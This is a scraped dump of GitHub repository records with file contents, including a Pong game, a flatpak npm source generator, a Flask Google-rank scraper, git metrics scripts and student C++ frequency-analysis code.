A_omega_o=((1-phi_omega_o)*2**0.5) / (phi_omega_o**1.5)\r\n\r\n # mass_ro\r\n K_0=A_io/A_omega_o\r\n C_o=r_ko-r_bxo/ r_kso\r\n f=np.pi*r_kso**2*(2*rho_o*delta_p)**0.5\r\n g=(phi_omega_o**-2 + (A_io**2*K_0**2) / (1-phi_omega_o) +Xi_yo*n_o*(A_io/C_o)**2)**0.5\r\n mass_ro=f/g \r\n print(\"mass_ro = {}, u = {}\".format(mass_ro, u))\r\n delta_mass = mass_ro - 
mass_ro_target\r\n return delta_mass**2\r\n\r\nu0 = np.array([r_kso0, r_bxo0, r_ko0])\r\n\r\ncon=LinearConstraint([-1,0,1],[0],[np.inf])\r\n\r\nresult = minimize(func, u0, bounds=bnds, method=\"SLSQP\", tol=1e-8,constraints=con)\r\n\r\nresult_new=[i for i in result.x]\r\n\r\nprint('r_kso={:.1E},r_bxo={:.1E},r_ko={:.1E},l_bxo={:.1E}'.format(result_new[0],result_new[1],result_new[2],6*result_new[1]))\r\n" } ]
3
joseph-zhong/srpub
https://github.com/joseph-zhong/srpub
d961effc998de58ea7447c165b067d88faa4fb4c
795d8dbc976e4835913f2131f05b99539e391a37
119cb20a3aefed494b4956f3dcc39f4700f22f91
refs/heads/master
2020-05-31T20:04:47.978617
2019-05-13T19:07:10
2019-05-13T19:07:10
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.48794063925743103, "alphanum_fraction": 0.5046381950378418, "avg_line_length": 14.852941513061523, "blob_id": "c36dacc885c65a356de84f2a6eaf8b52c538d2f0", "content_id": "4c978a2e88277fbedbcd48e88dbf8359fbeb962c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 539, "license_type": "no_license", "max_line_length": 44, "num_lines": 34, "path": "/examples/python/excel.py", "repo_name": "joseph-zhong/srpub", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nclass Cell:\n def __init__(self, val):\n self.raw = val\n\n def __str__(self):\n if not self.raw:\n return \"\"\n return str(self.raw)\n\n\nclass Sheet:\n def __init__(self):\n self.cells = {}\n\n def set(self, cell, val):\n self.cells[cell] = Cell(val)\n\n def read(self, cell):\n c = self.cells.get(cell, Cell(None))\n return str(c)\n\n\n\ns = Sheet()\n\ns.set(\"A2\", \"5\")\nprint \"A2\", s.read(\"A2\")\n\ns.set(\"A3\", \"hello\")\nprint \"A3\", s.read(\"A3\")\n\nprint \"B5\", s.read(\"B5\")\n" }, { "alpha_fraction": 0.5476878881454468, "alphanum_fraction": 0.5621387362480164, "avg_line_length": 22.066667556762695, "blob_id": "9dc445eb7022cf568fcd62939a9f6a53315b857c", "content_id": "a9b21149c64ef7883008d61cd2afbf879b342bfc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 692, "license_type": "no_license", "max_line_length": 67, "num_lines": 30, "path": "/nslookup_regex.py", "repo_name": "joseph-zhong/srpub", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nimport re, sys, socket\n\nimport colorstrings\n\nnscache = dict()\ndef ns_lookup(ip):\n global nscache\n if ip in nscache:\n return nscache[ip]\n try:\n fullhost = socket.gethostbyaddr(ip)[0]\n except:\n nscache[ip] = None\n return None\n if 'prod.uber.internal' in fullhost:\n res = fullhost.split('.')[0]\n else:\n res = fullhost\n nscache[ip] = res\n return res\n\nfor line in sys.stdin:\n for ip in 
re.findall(r'\\d{1,3}.\\d{1,3}.\\d{1,3}.\\d{1,3}', line):\n box = ns_lookup(ip)\n if box:\n #print ip + ' is ' + box\n line = line.replace(ip, colorstrings.blue_str(box))\n print line.rstrip()\n" }, { "alpha_fraction": 0.5202217102050781, "alphanum_fraction": 0.5440361499786377, "avg_line_length": 26.676136016845703, "blob_id": "f488b0d5644676646f0bf8b11539ebf1d3082e8b", "content_id": "56433d2b1d4a3a9eb8b19035d089f4c4c7af4d57", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4871, "license_type": "no_license", "max_line_length": 96, "num_lines": 176, "path": "/git_metrics.py", "repo_name": "joseph-zhong/srpub", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nfrom __future__ import print_function\n\nfrom srutils import *\nimport sys, re\nimport operator\nfrom collections import namedtuple\n\n# A map of known aliases -> name\nkauths = {}\n\n# A map of kname to longest-name\nlongname = {}\n\nclass TimeRange:\n def __init__(self, start, end):\n self.start = start\n self.end = end\n\nall_cnt = {}\nall_tim = TimeRange(9999999999, 0)\nsme_cnt = {}\nsme_tim = TimeRange(9999999999, 0)\nl100_cnt = {}\nl100_tim = TimeRange(9999999999, 0)\n\noverall = False\nMY_NAME = \"sam russell\"\nif len(sys.argv) > 1:\n if sys.argv[1] == \"overall\":\n overall = True\n MY_NAME = \"zzzzzzzzzzz\"\n else:\n MY_NAME = sys.argv[1]\nSTRIP_PREFX = \"ctrl\"\n\ndef looks_similar(a, b):\n a = a.lower().strip()\n b = b.lower().strip()\n if a == b:\n return True\n words_a = a.split(\" \")\n words_b = b.split(\" \")\n if len(words_a) != len(words_b):\n return False\n for idx in range(len(words_a)):\n if words_a[idx] in words_b[idx] or words_b[idx] in words_a[idx]:\n continue\n return False\n return True\n\ndef put_in_known(name, email):\n global kauths\n name = name\n email = email\n\n # if we have both the name and email, we're done\n if name in kauths and email in kauths:\n #if kauths[name] == kauths[email]:\n # return\n return\n\n if 
name in kauths:\n # we have the name, but not the email\n kauths[email] = kauths[name]\n return\n\n if email in kauths:\n # we have the email, but not the name\n kauths[name] = kauths[email]\n return\n\n # we have neither the exact email nor exact name\n found = False\n for other_auth in kauths.keys():\n if looks_similar(name, other_auth):\n kauths[name] = kauths[other_auth]\n kauths[email] = kauths[other_auth]\n return\n\n # we did not find any similar name matches\n # so add a new entry\n fname = name\n if name.startswith(STRIP_PREFX):\n fname = name[len(STRIP_PREFX):]\n kauths[name] = fname\n kauths[email] = fname\n\ndef get_aliases(name, emails=True):\n global kauths\n res = {}\n for k, v in kauths.items():\n if v == name:\n if \"@\" in k or not emails:\n res[k] = True\n return res.keys()\n\ndef print_cnt_dict(title, cnts, tim, limit=10):\n sorted_x = sorted(cnts.items(), key=operator.itemgetter(1), reverse=True)\n did_me = False\n total_time = (tim.end - tim.start)\n print(\"\\n\\n=== {} === \\t ({})\".format(title, dur_to_human(total_time)))\n print(\"%3s\" % \"\" + \" \" + \"%5s\" % \"cnt \" + \" \" + \"/week\" + \" \" + \"name\")\n print(\"%3s\" % \"\" + \" \" + \"%5s\" % \"--- \" + \" \" + \"-----\" + \" \" + \"----\")\n for i, x in enumerate(sorted_x):\n kname = x[0]\n is_me = looks_similar(kname, MY_NAME)\n name = longname[kname].title()\n if is_me:\n did_me = True\n name = blue_str(name)\n cnt = x[1]\n rate = (float(cnt) / (total_time / 604800))\n if i == limit:\n if did_me:\n break\n else:\n print(\" ...\")\n if i >= limit and not is_me:\n continue\n print(\"%3d\" % (i+1) + \". 
\" + \"%5d \" % cnt + \" %.1f \" % rate + \" {0: <20}\".format(name))\n\ngit_log_raw = cmd(\"git log master --format='%H,%aN,%ae,%at'\")\n\nseen_me = False\ncommits = git_log_raw.split('\\n')\nfor i, c in enumerate(reversed(commits)):\n cs = c.strip().split(',')\n if len(cs) != 4:\n continue\n sha = cs[0].strip()\n name = cs[1].strip().lower()\n email = cs[2].strip().lower()\n dt = int(cs[3].strip())\n\n is_mine = looks_similar(name, MY_NAME)\n if is_mine:\n seen_me = True\n\n put_in_known(name, email)\n kname = kauths[name]\n\n # set the longest-name which kname maps to\n if kname not in longname:\n longname[kname] = kname\n if len(name) >len( longname[kname]):\n longname[kname] = name\n\n all_cnt[kname] = all_cnt.get(kname, 0) + 1\n all_tim.start = min(all_tim.start, dt)\n all_tim.end = max(all_tim.end, dt)\n if seen_me:\n sme_cnt[kname] = sme_cnt.get(kname, 0) + 1\n sme_tim.start = min(sme_tim.start, dt)\n sme_tim.end = max(sme_tim.end, dt)\n if i > len(commits) - 100:\n l100_cnt[kname] = l100_cnt.get(kname, 0) + 1\n l100_tim.start = min(l100_tim.start, dt)\n l100_tim.end = max(l100_tim.end, dt)\n\n#print(\"\\n\\n== kauth map ==\")\n#for k,v in kauths.items():\n# print(\"%50s\" % k, \" \", \"%50s\" % v)\n\n#print(\"\\n\\n== kauth map ==\")\n#for k,v in all_cnt.items():\n# print(\"%50s\" % k, \" \", \"%50s\" % v)\n\nif overall:\n print_cnt_dict(\"Overall\", all_cnt, all_tim, limit=100)\nelse:\n # print personalized\n print_cnt_dict(\"Overall\", all_cnt, all_tim)\n print_cnt_dict(\"Since-First\", sme_cnt, sme_tim)\n print_cnt_dict(\"Last 100\", l100_cnt, l100_tim)\n" } ]
3
sqrtxander/pong
https://github.com/sqrtxander/pong
37aaa9b621c7aaf8b0310179db419be11effcfcb
b06cc3657debda33338f61001d0f8a00e49c41ff
501d389c62dc239a05b7beb71ceada4480991790
refs/heads/main
2023-07-14T16:02:28.137545
2021-08-29T02:31:02
2021-08-29T02:31:02
400,449,197
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5487679839134216, "alphanum_fraction": 0.5739219784736633, "avg_line_length": 30.67479705810547, "blob_id": "c51e7b8b677d016fb67d148836491926165d790b", "content_id": "99b0cb33e236a5e5e2cd3bdca1a8d8ed95b2370e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3896, "license_type": "no_license", "max_line_length": 116, "num_lines": 123, "path": "/main.py", "repo_name": "sqrtxander/pong", "src_encoding": "UTF-8", "text": "import pygame\nimport math\nimport random\n\n# GLOBALS\nBLACK = (0, 0, 0)\nWHITE = (255, 255, 255)\nPXSIZE = 4\nWIDTH, HEIGHT = 320 * PXSIZE, 240 * PXSIZE\n\n# INITIALISE PYGAME\npygame.init()\npygame.display.set_caption('Pong!')\npygame.display.set_icon(pygame.image.load('media/icon.png'))\nwin = pygame.display.set_mode((WIDTH, HEIGHT))\nclock = pygame.time.Clock()\n# font = pygame.font.SysFont('Jetbrains Mono', 30)\nrandom.seed()\n\n\nclass Ball:\n def __init__(self):\n self.img = pygame.image.load('media/ball.png')\n self.img = pygame.transform.scale(self.img, (self.img.get_width() * PXSIZE, self.img.get_height() * PXSIZE))\n self.rect = self.img.get_rect()\n self.dir = math.radians(random.uniform(165, 196))\n # self.dir = math.radians(170)\n self.speed = 8*PXSIZE\n self.rect.center = ((WIDTH - self.rect.width)//2, (HEIGHT - self.rect.height)//2)\n self.truepos = [self.rect.x, self.rect.y]\n\n def reset_ball(self):\n\n if random.randint(0, 1):\n self.dir = math.radians(random.uniform(150, 170))\n else:\n self.dir = math.radians(random.uniform(180, 220))\n\n print(math.degrees(self.dir))\n self.rect.center = ((WIDTH - self.rect.width)//2, (HEIGHT - self.rect.height)//2)\n self.truepos = [self.rect.x, self.rect.y]\n\n def update(self, p1, p2):\n win.blit(self.img, self.rect)\n\n dx = self.speed * math.cos(self.dir)\n dy = self.speed * math.sin(self.dir)\n\n steps = int(abs(dx) + abs(dy))\n for _ in range(0, steps, PXSIZE):\n self.truepos[0] += self.speed * 
math.cos(self.dir)/steps\n self.truepos[1] -= self.speed * math.sin(self.dir)/steps\n self.rect.topleft = self.truepos[0], self.truepos[1]\n self.bounce(p1, p2)\n\n if self.rect.right < 0 or self.rect.left > WIDTH:\n self.reset_ball()\n\n def bounce(self, p1, p2):\n # top and bottom\n if self.rect.y < 0 or self.rect.y > HEIGHT - self.rect.height:\n self.dir *= -1\n\n # paddles\n if pygame.Rect.colliderect(self.rect, p1.rect) or pygame.Rect.colliderect(self.rect, p2.rect):\n self.dir = math.radians(180) - self.dir\n\n # if pygame.Rect.colliderect(self.rect, p1.rect):\n # dy = self.rect.centery - p1.rect.centery\n # dx = p1.rect.centerx - self.rect.centerx\n # self.dir = math.atan2(dy, dx)\n # self.dir += math.radians(180)\n #\n # if pygame.Rect.colliderect(self.rect, p2.rect):\n # dy = self.rect.centery - p2.rect.centery\n # dx = p2.rect.centerx - self.rect.centerx\n # self.dir = math.atan2(dy, dx)\n # self.dir += math.radians(180)\n\n\nclass Paddle:\n def __init__(self, x):\n self.img = pygame.image.load('media/paddle.png')\n self.img = pygame.transform.scale(self.img, (self.img.get_width() * PXSIZE, self.img.get_height() * PXSIZE))\n self.rect = self.img.get_rect()\n self.speed = 4*PXSIZE\n self.rect.center = (x, HEIGHT//2)\n\n def update(self, dy):\n win.blit(self.img, self.rect)\n\n dy = self.speed*dy\n steps = abs(dy)\n for _ in range(0, steps, PXSIZE):\n if 0 < self.rect.y - dy/steps < HEIGHT - self.rect.height:\n self.rect.y -= dy/steps\n\n\ndef main():\n pl_1 = Paddle(32 * PXSIZE)\n pl_2 = Paddle(WIDTH-32 * PXSIZE)\n ball = Ball()\n run = True\n\n while run:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n run = False\n\n pressed = pygame.key.get_pressed()\n\n win.fill(BLACK)\n pl_1.update(pressed[pygame.K_w]-pressed[pygame.K_s])\n pl_2.update(pressed[pygame.K_UP]-pressed[pygame.K_DOWN])\n ball.update(pl_1, pl_2)\n\n pygame.display.update()\n\n clock.tick(30)\n\n\nif __name__ == '__main__':\n main()\n" } ]
1
adityashah1212/flatpak-builder-tools
https://github.com/adityashah1212/flatpak-builder-tools
0e4ec8bcef9dcdab3a12008e35fdcd143d538a5f
21875364f78fc6076e4e98739fa143b2b38ff9a2
1edcfb146103fee099015f5bd55d7e6de403b832
refs/heads/master
2021-09-03T02:49:56.399443
2017-12-21T10:07:28
2017-12-21T10:07:28
115,273,163
0
0
null
2017-12-24T15:53:17
2017-12-21T10:08:16
2017-12-21T10:08:15
null
[ { "alpha_fraction": 0.5492262840270996, "alphanum_fraction": 0.5597667694091797, "avg_line_length": 34.672000885009766, "blob_id": "e8a576e1a10e4be3914dae41395bf51832c22fee", "content_id": "223a1581839ba7bc7a4fe28726da73838b08f14d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4459, "license_type": "no_license", "max_line_length": 128, "num_lines": 125, "path": "/npm/flatpak-npm-generator.py", "repo_name": "adityashah1212/flatpak-builder-tools", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n\nimport argparse\nimport sys\nimport json\nimport base64\nimport binascii\nimport urllib.request\nimport urllib.parse\n\nelectron_arches = {\n \"ia32\": \"i386\",\n \"x64\": \"x86_64\",\n \"arm\": \"arm\"\n}\n\n\ndef getModuleSources(module, seen=None, include_devel=True):\n sources = []\n seen = seen or {}\n\n version = module.get(\"version\", \"\")\n added_url = None\n\n if module.get(\"dev\", False) and not include_devel:\n pass\n if module.get(\"bundled\", False):\n pass\n elif module.get(\"resolved\", False) or (version.startswith(\"http\") and not version.endswith(\".git\")):\n if module.get(\"resolved\", False):\n url = module[\"resolved\"]\n else:\n url = module[\"version\"]\n added_url = url\n integrity = module[\"integrity\"]\n if integrity not in seen:\n seen[integrity] = True\n integrity_type, integrity_base64 = integrity.split(\"-\", 2)\n hex = binascii.hexlify(base64.b64decode(integrity_base64)).decode('utf8')\n source = {\"type\": \"file\",\n \"url\": url,\n \"dest\": \"npm-cache/_cacache/content-v2/%s/%s/%s\" % (integrity_type, hex[0:2], hex[2:4]),\n \"dest-filename\": hex[4:]}\n source[integrity_type] = hex\n sources.append(source)\n\n if added_url:\n # Special case electron, adding sources for the electron binaries\n tarname = added_url[added_url.rfind(\"/\")+1:]\n if tarname.startswith(\"electron-\") and tarname[len(\"electron-\")].isdigit() and tarname.endswith(\".tgz\"):\n 
electron_version = tarname[len(\"electron-\"):-len(\".tgz\")]\n\n shasums_url = \"https://github.com/electron/electron/releases/download/v\" + electron_version + \"/SHASUMS256.txt\"\n f = urllib.request.urlopen(shasums_url)\n shasums = {}\n shasums_data = f.read().decode(\"utf8\")\n for line in shasums_data.split('\\n'):\n l = line.split()\n if len(l) == 2:\n shasums[l[1][1:]] = l[0]\n\n mini_shasums = \"\"\n for arch in electron_arches.keys():\n basename = \"electron-v\" + electron_version + \"-linux-\" + arch + \".zip\"\n source = {\"type\": \"file\",\n \"only-arches\": [electron_arches[arch]],\n \"url\": \"https://github.com/electron/electron/releases/download/v\" + electron_version + \"/\" + basename,\n \"sha256\": shasums[basename],\n \"dest\": \"npm-cache\"}\n sources.append(source)\n mini_shasums = mini_shasums + shasums[basename] + \" *\" + basename + \"\\n\"\n source = {\"type\": \"file\",\n \"url\": \"data:\" + urllib.parse.quote(mini_shasums.encode(\"utf8\")),\n \"dest\": \"npm-cache\",\n \"dest-filename\": \"SHASUMS256.txt-\" + electron_version}\n sources.append(source)\n\n if \"dependencies\" in module:\n deps = module[\"dependencies\"]\n for dep in deps:\n child_sources = getModuleSources(deps[dep], seen, include_devel=include_devel)\n sources = sources + child_sources\n\n return sources\n\n\ndef main():\n parser = argparse.ArgumentParser(description='Flatpak NPM generator')\n parser.add_argument('lockfile', type=str)\n parser.add_argument('-o', type=str, dest='outfile', default='generated-sources.json')\n parser.add_argument('--production', action='store_true', default=False)\n parser.add_argument('--recursive', action='store_true', default=False)\n args = parser.parse_args()\n\n include_devel = not args.production\n\n outfile = args.outfile\n\n if args.recursive:\n import glob\n lockfiles = glob.iglob('**/%s' % args.lockfile, recursive=True)\n else:\n lockfiles = [args.lockfile]\n\n sources = []\n seen = {}\n for lockfile in lockfiles:\n 
print('Scanning \"%s\" ' % lockfile, file=sys.stderr)\n\n with open(lockfile, 'r') as f:\n root = json.loads(f.read())\n\n s = getModuleSources(root, seen, include_devel=include_devel)\n sources += s\n print(' ... %d new entries' % len(s), file=sys.stderr)\n\n print('%d total entries' % len(sources), file=sys.stderr)\n\n print('Writing to \"%s\"' % outfile)\n with open(outfile, 'w') as f:\n f.write(json.dumps(sources, indent=4))\n\n\nif __name__ == '__main__':\n main()\n" } ]
1
anilabhadatta/rank_of_url_in_google_search
https://github.com/anilabhadatta/rank_of_url_in_google_search
48e2ca03ce3fc2218340f7df63b4b4a0077fab30
930e8339b9fa2c00cf6d49f2f8e7b42ac70316c2
344e0dd012a5cafef43f524a9a3c07dcf1af9518
refs/heads/main
2023-07-11T13:03:50.993094
2021-08-20T15:55:45
2021-08-20T15:55:45
398,325,004
2
0
null
null
null
null
null
[ { "alpha_fraction": 0.6039284467697144, "alphanum_fraction": 0.6147757172584534, "avg_line_length": 32.77227783203125, "blob_id": "30a6becaee3a892f31ced590876ef74a03a1cb95", "content_id": "f078e8fb0532439be4349b3507ee24677eb599d8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3411, "license_type": "no_license", "max_line_length": 154, "num_lines": 101, "path": "/main.py", "repo_name": "anilabhadatta/rank_of_url_in_google_search", "src_encoding": "UTF-8", "text": "from flask import Flask, render_template, Response, request, redirect, url_for\nimport requests\nfrom bs4 import BeautifulSoup\nfrom werkzeug.utils import secure_filename\nimport os\nfrom openpyxl import load_workbook\nfrom fake_useragent import UserAgent\nimport random\n\napp = Flask(__name__)\n\n\[email protected](\"/\")\ndef index():\n return render_template(\"index.html\", condition=False)\n\n\[email protected](\"/result/\", methods=['POST'])\ndef search():\n excel_file = request.files['file']\n file_name = secure_filename(excel_file.filename)\n file_path = os.path.join(app.config['UPLOAD_FOLDER'], file_name)\n excel_file.save(file_path)\n keyword_list, webpage_list, rank_list = [], [], []\n read_excel(file_path, file_name, keyword_list, webpage_list, rank_list)\n return render_template(\"index.html\", len=len(keyword_list), keyword_list=keyword_list, webpage_list=webpage_list, rank_list=rank_list, condition=True)\n\n\ndef read_excel(file_path, file_name, keyword_list, webpage_list, rank_list):\n print(\"Reading Excel\")\n excel_path = file_path\n work_book = load_workbook(excel_path, read_only=False)\n work_sheet = work_book[\"Sheet1\"]\n print(work_sheet.max_row+1)\n for row in range(2, work_sheet.max_row+1):\n keyword = work_sheet.cell(row=row, column=1)\n check_url = work_sheet.cell(row=row, column=2)\n rank_cell = work_sheet.cell(row=row, column=3)\n\n print(\"Searching :\", keyword.value, check_url.value)\n if keyword.value == None or 
check_url.value == None:\n print(\"Skipping , invalid parameters\")\n rank = \"-1,\"\n rank_cell.value = rank[:-1]\n pass\n else:\n rank = find_rank(keyword.value, check_url.value)\n rank_cell.value = rank[:-1]\n\n keyword_list.append(keyword.value)\n webpage_list.append(check_url.value)\n rank_list.append(rank[:-1])\n\n newfile = os.getcwd()+\"\\\\\"+file_name\n work_book.save(newfile)\n os.remove(file_path)\n\n\ndef find_rank(keyword, check_url):\n #proxies = ['14.140.131.82:3128']\n #proxy = random.choice(proxies)\n #print(proxy)\n number_result, rank = 100, 1\n ua = UserAgent()\n url = \"https://www.google.com/search?q=\"\n keyword = keyword.replace(\" \", \"+\")\n url = url + keyword + \"&num=\" + str(number_result)\n #page = requests.get(url,proxies={\"http\": proxy, \"https\": proxy},headers={\"User-Agent\": ua.random})\n page = requests.get(url)\n soup = BeautifulSoup(page.text, 'html.parser')\n result_div = soup.find_all(\n 'div', attrs={'class': 'ZINbbc xpd O9g5cc uUPGi'})\n rank_list_temp = \"\"\n\n # debugging html file\n # f = open(\"output.html\",'w',encoding=\"utf-8\")\n # f.write(page.text)\n # f.close()\n\n for div in result_div:\n try:\n link = div.find(\"a\", href=True)\n # print(link['href'][7:7+len(check_url)], rank)\n if link['href'][7:7+len(check_url)] == check_url:\n print(\"Found Website , Rank :\", rank)\n rank_list_temp += str(rank)+\",\"\n rank += 1\n except:\n pass\n return (rank_list_temp,\"Website not found\")[rank_list_temp == \"\"]\n\n\nif __name__ == \"__main__\":\n home_dir = os.path.expanduser(\"~\")\n UPLOAD_FOLDER = os.path.join(home_dir, \"upload\\\\\")\n app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\n try:\n os.makedirs(UPLOAD_FOLDER)\n except:\n pass\n app.run(debug=True)\n" }, { "alpha_fraction": 0.8063380122184753, "alphanum_fraction": 0.8063380122184753, "avg_line_length": 55.79999923706055, "blob_id": "56aec4f5905e792f69010956b4a2732ddce259ad", "content_id": "e4a28935bf03deb48870f8dad799d206cf5d3030", "detected_licenses": 
[], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 284, "license_type": "no_license", "max_line_length": 185, "num_lines": 5, "path": "/README.md", "repo_name": "anilabhadatta/rank_of_url_in_google_search", "src_encoding": "UTF-8", "text": "# Rank of Website in Google Search Engine\n\nA simple Flask web application that uses requests and BeautifulSoup to search the keyword in Google search engine and find the rank of website provided along with keyword in excel file.\n\nActivate the env and run main.py to start the server.\n" } ]
2
goggalor1954/CSCI360
https://github.com/goggalor1954/CSCI360
47313234f67b357991cfa4ef2548726b32c36bd4
fad8c52ab1ebd6537942f4936ed33f0865a7d706
af5b4d709f05610b91d6a23e32ce8ec0a140b6ed
refs/heads/master
2021-01-23T21:59:46.100379
2017-10-25T13:11:42
2017-10-25T13:11:42
102,918,407
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7066037654876709, "alphanum_fraction": 0.7122641801834106, "avg_line_length": 22.53333282470703, "blob_id": "3078fd590aa5c19539aa697bf70c3a204df03864", "content_id": "478ca96f3536a58e023ba9a24afd68b10ca4229e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1060, "license_type": "no_license", "max_line_length": 126, "num_lines": 45, "path": "/Project_1/Final_Files/sol_sap.cpp", "repo_name": "goggalor1954/CSCI360", "src_encoding": "UTF-8", "text": "/*\nJames Roesemann\nCSCI360\nproject 1\nsol_sap.cpp\n\nopens and reads in a file named corpus_clean.txt\noutputs to corpus_freq.txt \ncorpus_freq.txt contains, in decending order, a row containing the pairs <letter>, <rel_freq> \nletter is a alphabetical or space character and rel_freq is a floting point number is the relitive frequency of its occurance.\n*/\n\n#include <iostream>\n#include <list>\n#include <fstream>\n#include \"charBox.h\"\n#include \"statAnalyzer.h\"\nusing namespace std;\n\t\n\nint main()\n{\n\n\tlist<charBox> alphaChars;\n\tbuildCharBox(&alphaChars);\n\tfstream infile, outfile;\n\tinfile.open(\"corpus_clean.txt\");\n\twhile(!infile.eof()){charCount( &alphaChars, infile.get());}\n\tinfile.close();\n\tsetFreq(&alphaChars, getTotal(alphaChars));\n\toutfile.open(\"corpus_freq.txt\", std::fstream::out | std::fstream::trunc);\n\tcharBox temp;\n\n\twhile(!alphaChars.empty()) \t\n\t{\n\t\ttemp=getHighest(alphaChars, 0, alphaChars.front().getName());\n\t\toutfile << temp.getName() << \", \"<< temp.getFreq() << endl;\n\t\tremoveCharBox( &alphaChars, temp.getName());\n\t}\n\toutfile.close();\n\n\t\n\n\treturn 0;\n}\n\n" }, { "alpha_fraction": 0.669099748134613, "alphanum_fraction": 0.6812652349472046, "avg_line_length": 17.266666412353516, "blob_id": "b020ba9dd15fd1f457fcdf27b803d48f8d060e3e", "content_id": "64e5e6bbab75de5a4e910f5702a9f6e97491d552", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": 
"C++", "length_bytes": 822, "license_type": "no_license", "max_line_length": 180, "num_lines": 45, "path": "/Project_1/Final_Files/charBox.h", "repo_name": "goggalor1954/CSCI360", "src_encoding": "UTF-8", "text": "#ifndef CHARBOX_H\n#define CHARBOX_H\n\n//A class conting the char variables name and cryptName, an int variable to count the occurance of the char, and a float variable to store the frequencey of the occuring character.\nclass charBox\n{\nprivate:\n\tint count;\n\tchar name, cryptName;\n\tfloat freq;\npublic:\n\tvoid add(){count=count+1;}\n\tvoid setName(char x){name =x;}\n\tvoid setCryptName(char x){cryptName=x;}\n\tvoid setFreq(int total){freq=float(count)/float(total);}\n\tint getCount(){return count;}\n\tchar getName(){return name;}\n\tchar getCryptName(){return cryptName;}\n\tfloat getFreq(){return freq;}\n\n\tcharBox()\n\t{\n\t\tcount =0;\n\t\tname='\\0';\n\t\tcryptName='\\0';\n\t\tfreq=0;\n\t}\n\tcharBox(char x)\n\t{\n\t\tcount=0;\n\t\tname=x;\n\t\tcryptName='\\0';\n\t\tfreq=0;\n\t}\n\tcharBox(char x, char y)\n\t{\n\t\tcount=0;\n\t\tname=x;\n\t\tcryptName=y;\n\t\tfreq=0;\n\t}\n};\n\n\n#endif\n" }, { "alpha_fraction": 0.701777458190918, "alphanum_fraction": 0.7142857313156128, "avg_line_length": 27.129629135131836, "blob_id": "84a4f3a7afb8698be4153ff9bb05c3e146be518c", "content_id": "11f1b6e43d8005117af58a5fe5577a55c3034414", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3038, "license_type": "no_license", "max_line_length": 201, "num_lines": 108, "path": "/Project_1/decode1.cpp", "repo_name": "goggalor1954/CSCI360", "src_encoding": "UTF-8", "text": "//james Roesemann\n//CSCI360\n//Project1\n\n#include <iostream>\n#include <fstream>\nusing namespace std;\n\nclass charBox\n{\n\tprivate:\n\tchar name;\n\tint count;\n\tcharBox *next;\n\t\n\tpublic:\n\tcharBox()\n\t{\n\t\tname='\\0';\n\t\tcount=0;\n\t\tnext=NULL;\n\t}\n\tcharBox(charBox 
&x)\n\t{\n\t\tname='\\0';\n\t\tcount=0;\n\t\tnext=&x;\n\t}\n\tchar getName(){return name;}\n\tint getCount(){return count;}\n\tcharBox getNext(){return *next;}\n\tvoid setName(char x){name=x;}\n\tvoid add(){count++;}\n\tvoid setNext(charBox &x){next=&x;}\n\tvoid setNext(){this->next=new charBox();} //set next to a newly created charBox pointer.\n};\nvoid charBuild(charBox &charBoxVar, int charVal) //recursivly assigns the the character name based of the value of charVal to name. creates a new charBox object and points to it. stops when charVal=z. \n{\n\tcharBoxVar.setName(charVal);\n\tif(charVal==90){return;}\n\tcharBoxVar.setNext();\n\tcharBuild(charBoxVar.getNext(), charVal++);\n}\nvoid charBuild(charBox &charBoxVar)//sets the first character variable to ' ' and begings the recursive fuiction charbuild.\n{\n\tcharBoxVar.setName(' ');\n\tcharBoxVar.setNext();\n\tcharBuild(charBoxVar.getNext(), 65);\n}\nvoid cryptoCharBuild(charBox &charBoxVar, int x) //recursivly builds 26 charBox objects to be filled later by another function.\n{\n\tif(x==26) return;\n\tcharBoxVar.setNext();\n\tcryptoCharBuild(charBoxVar.getNext(), x-++);\n}\nvoid charBoxCount(charBox &charBoxVar, char x) //counts how many times the given character occurs. if the charBoxVal for name == NULL, asigns the curent character to name.\n{\n\tif(charBox.getName()=='\\0'){charBox.setName(x)};\n\tif( x==charBoxVar.getName())\n\t{\n\t\tcharBoxVar.add();\n\t\treturn;\n\t}\n\tif(charBoxVar.getNext()=='\\0'){return;}\n\tcharBoxCount(charBoxVar.getNext(), x);\n}\nvoid readAlphaChars( charBox &charBoxVar) //reads in the characters of moby dick, counts A-z and the space character.\n{\n\tifstream inFile(\"MobyDick.txt\");\n\twhile(!inFile.eof())\n\t{ //need to make sure that lower case letters a read in as upercase letters.\n\t\tif(infile.get()<=122 && infile.get>=97)\n\t\t{\n\t\t\tcharBoxCount( charBoxVar, infile.get()-32)\n\t\t}//why 32 insted of 26? 
make sure that numbers right.\n\t\telse \n\t\t{\n\t\t\tcharBoxCount( charBoxVar, infile.get());\n\t\t}//not done here. i need to fix it so that if it's a lower case letter it becomes an upper case letter.\n\t}\n\tinFile.close();\t\n}\nvoid readCryptoChars(charBox &charBoxVar)//reads in the crypto text and counts the characters\n{\n\tifstream inFile(\"ciphertext.txt\");\n\twhile(!inFile.eof())\n\t{\n\t\tcharBoxCount(charBoxVar, infile.get());\n\t}\n\tinFile.close();\n};\n\t\n\nint main()\n{\n\tcharBox alphaChars;\n\tcharBox cryptoChars;\n\tcharBuild(alphaChars);\n\tcryptoCharBuild(cryptoChars, 0);\n\n\treturn 0;\n}\n\n\n/* Outline of what i need to do:\n- create a character object containing the character and a count variable. set the inittial character value to null. and a pointer to the next object.\n- create 2 27 length character object. one for a-z and ' '. \n- create another 27 length , but assign the character 